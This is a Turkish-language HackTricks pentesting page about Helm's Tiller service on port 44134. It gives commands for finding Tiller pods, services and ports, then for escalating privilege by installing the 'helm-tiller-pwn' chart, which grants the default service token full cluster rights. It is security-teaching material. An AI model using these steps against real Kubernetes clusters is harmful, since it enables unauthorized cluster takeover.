hacktricks/network-services-pentesting/44134-pentesting-tiller-helm.md

5.4 KiB
Raw Blame History

{% hint style="success" %} AWS Hacking'i öğrenin ve pratik yapın:HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)
GCP Hacking'i öğrenin ve pratik yapın: HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)

HackTricks'i Destekleyin
{% endhint %}

Temel Bilgiler

Helm, Kubernetes için paket yöneticisidir. YAML dosyalarını paketlemeye ve bunları kamu ve özel depolarda dağıtmaya olanak tanır. Bu paketlere Helm Charts denir. Tiller, varsayılan olarak 44134 numaralı portta çalışan hizmettir.

Varsayılan port: 44134

PORT      STATE SERVICE VERSION
44134/tcp open  unknown

Enumeration

Eğer farklı ad alanlarının podlarını ve/veya hizmetlerini sıralayabiliyorsanız, bunları sıralayın ve adında "tiller" geçenleri arayın:

kubectl get pods | grep -i "tiller"
kubectl get services | grep -i "tiller"
kubectl get pods -n kube-system | grep -i "tiller"
kubectl get services -n kube-system | grep -i "tiller"
kubectl get pods -n <namespace> | grep -i "tiller"
kubectl get services -n <namespace> | grep -i "tiller"

Örnekler:

kubectl get pods -n kube-system
NAME                                       READY   STATUS             RESTARTS   AGE
kube-scheduler-controlplane                1/1     Running            0          35m
tiller-deploy-56b574c76d-l265z             1/1     Running            0          35m

kubectl get services -n kube-system
NAME            TYPE        CLUSTER-IP     EXTERNAL-IP   PORT(S)                  AGE
kube-dns        ClusterIP   10.96.0.10     <none>        53/UDP,53/TCP,9153/TCP   35m
tiller-deploy   ClusterIP   10.98.57.159   <none>        44134/TCP                35m

Bu hizmetin çalışıp çalışmadığını kontrol ederek 44134 numaralı portu kontrol etmeyi de deneyebilirsiniz:

sudo nmap -sS -p 44134 <IP>

Bir kez keşfettikten sonra, istemci helm uygulamasını indirerek onunla iletişim kurabilirsiniz. homebrew gibi araçlar kullanabilir veya resmi sürümler sayfasına** bakabilirsiniz.** Daha fazla ayrıntı veya diğer seçenekler için kurulum kılavuzuna bakın.

Sonra, servisi listeleyebilirsiniz:

helm --host tiller-deploy.kube-system:44134 version

Yetki Yükseltme

Varsayılan olarak Helm2, kube-system ad alanında yüksek yetkilerle kuruldu, bu nedenle hizmeti bulup buna erişiminiz varsa, bu size yetki yükseltme imkanı verebilir.

Yapmanız gereken tek şey, tüm kümedeki her şeye varsayılan hizmet token erişimi verecek olan şu paketi kurmaktır: https://github.com/Ruil1n/helm-tiller-pwn

git clone https://github.com/Ruil1n/helm-tiller-pwn
helm --host tiller-deploy.kube-system:44134 install --name pwnchart helm-tiller-pwn
/pwnchart

In http://rui0.cn/archives/1573 saldırının açıklamasını bulabilirsiniz, ancak temelde, helm-tiller-pwn/pwnchart/templates/ içindeki clusterrole.yaml ve clusterrolebinding.yaml dosyalarını okursanız, tüm ayrıcalıkların varsayılan tokene nasıl verildiğini görebilirsiniz.

{% hint style="success" %} AWS Hacking Öğrenin ve Pratik Yapın:HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking Öğrenin ve Pratik Yapın: HackTricks Training GCP Red Team Expert (GRTE)

HackTricks'i Destekleyin
{% endhint %}